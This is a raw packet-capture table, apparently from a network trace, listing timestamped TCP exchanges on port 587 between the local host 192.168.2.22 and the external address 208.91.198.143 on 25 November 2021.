Nov 25, 2021 18:22:38.843381882 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:38.843843937 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:38.844156027 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:38.972611904 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:38.996254921 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:39.124743938 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:39.124900103 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:39.279792070 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:39.280284882 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:39.432117939 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:39.432149887 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:39.432733059 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:39.585161924 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:39.585583925 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:39.739599943 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:39.740127087 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:39.892735004 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:39.893397093 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:40.063146114 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:40.063385963 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:40.215734005 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:40.216219902 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:40.216430902 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:40.216706991 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:40.217039108 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:40.230341911 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:40.368237019 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:40.368346930 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:40.368640900 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:40.422219992 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:40.422326088 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:40.520201921 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:40.520284891 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:40.574161053 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:40.574199915 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:40.574392080 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:40.672102928 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:40.672123909 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:40.672259092 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:40.726310968 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:40.726458073 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:40.726567030 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:40.726608038 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:40.824110985 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:40.824143887 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:40.824243069 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:40.824301958 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:40.879379988 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:40.879409075 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:40.879417896 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:40.879594088 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:40.880072117 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:40.880179882 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:40.976162910 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:40.976192951 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:40.976206064 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:40.976232052 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:40.976351023 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:40.976413965 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:40.976989031 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:40.977085114 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.031667948 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.031677008 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.031687021 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.031949997 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.032110929 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.032201052 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.074625015 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.074788094 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.128490925 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.128521919 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.128537893 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.128720999 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.129815102 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.129836082 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.129945993 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.171171904 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.171329975 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.184258938 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.184284925 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.184292078 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.184354067 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.184503078 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.184576035 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.226866961 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.227154016 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.280949116 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.280982971 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.280998945 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.281183004 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.281284094 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.281371117 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.281732082 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.281807899 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.281898022 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.281985044 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.323385954 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.323446989 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.323539972 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.323582888 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.336874008 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.336932898 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.336958885 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.336985111 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.337009907 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.337194920 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.337284088 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.380496979 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.380542040 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.380738020 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.433387995 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.433434010 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.433460951 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.433485985 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.433660030 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.433940887 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.433980942 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.434016943 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.434040070 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.434051037 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.434067011 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.434082031 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.434087992 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.434094906 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.434149981 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.434187889 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.434259892 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.475466967 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.475631952 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.475647926 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.475682974 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.475696087 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.475740910 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.475763083 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.489362955 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.489387035 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.489469051 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.489578962 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.489628077 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.489825010 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.489836931 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.489924908 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.489933968 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.490068913 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.490268946 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.490283012 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.490391016 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:41.490578890 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.490808010 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.532751083 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.573023081 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.586308956 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.586360931 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.586393118 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.586419106 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.586740971 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.586766958 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.586791992 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.587419033 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.587456942 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.587488890 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.587522030 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.587558031 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.587584019 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.587616920 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.587654114 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.588018894 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.588044882 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.588069916 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.588094950 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.588167906 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.588572025 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.628030062 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.628052950 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.641629934 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.641834021 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.641845942 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.641853094 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.642309904 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.643848896 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:41.810641050 CET	587	49171	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:42.017018080 CET	49171	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:07.048935890 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:07.201025963 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:07.201162100 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:07.356256962 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:07.391012907 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:07.543034077 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:07.543054104 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:07.543271065 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:07.695821047 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:07.696304083 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:07.850228071 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:07.850539923 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:07.996356010 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:07.996689081 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:08.149750948 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:08.149959087 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:08.295223951 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:08.295766115 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:08.295905113 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:08.296039104 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:08.296179056 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:08.309787989 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:08.441834927 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:08.441852093 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:08.441921949 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:08.493841887 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:08.493920088 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:08.587034941 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:08.587114096 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:08.638700008 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:08.638726950 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:08.638824940 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:08.731934071 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:08.732117891 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:08.783746958 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:08.784960032 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:08.784976006 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:08.784991980 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:08.785051107 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:08.785087109 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:08.876955986 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:08.877013922 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:08.877043009 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:08.877216101 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:08.929842949 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:08.929894924 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:08.929924011 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:08.929949045 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:08.930097103 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:08.930175066 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.022373915 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.022423983 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.022465944 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.022481918 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.022582054 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.075176954 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.075198889 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.075381041 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.075443983 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.075464964 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.075484991 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.075506926 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.075522900 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.075566053 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.167464018 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.167494059 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.167540073 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.167555094 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.167761087 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.167880058 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.167893887 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.167974949 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.168273926 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.168351889 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.220504999 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.220552921 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.220582008 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.220609903 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.220753908 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.220943928 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.220984936 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.221040964 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.221065998 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.312798023 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.312832117 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.312865973 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.312979937 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.312999010 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.313129902 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.313175917 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.313196898 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.313234091 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.313277006 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.313307047 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.365906954 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.365936041 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.365952969 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.366117954 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.366175890 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.366193056 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.366331100 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.366344929 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.366367102 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.366416931 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.366441965 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.366592884 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.366609097 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.366647005 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.366666079 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.368644953 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.368756056 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.458050013 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.458137035 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.458293915 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.458378077 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.458507061 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.458535910 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.458632946 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.458652973 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.458662987 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.458681107 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.458705902 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.458741903 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.458775043 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.458854914 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.458944082 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.459044933 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.459112883 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.511255980 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.511311054 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.511322975 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.511451006 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.511491060 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.511540890 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.511594057 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.511607885 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.511661053 CET	49172	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:23:09.511727095 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.511740923 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.511847019 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.511900902 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.516716003 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.603344917 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.603461027 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.603475094 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.603483915 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.603833914 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.603852034 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.604231119 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.604245901 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.604291916 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.604302883 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.604491949 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.604504108 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.604676962 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.604896069 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.604912043 CET	587	49172	208.91.198.143	192.168.2.22
Nov 25, 2021 18:23:09.605169058 CET	587	49172	208.91.198.143	192.168.2.22
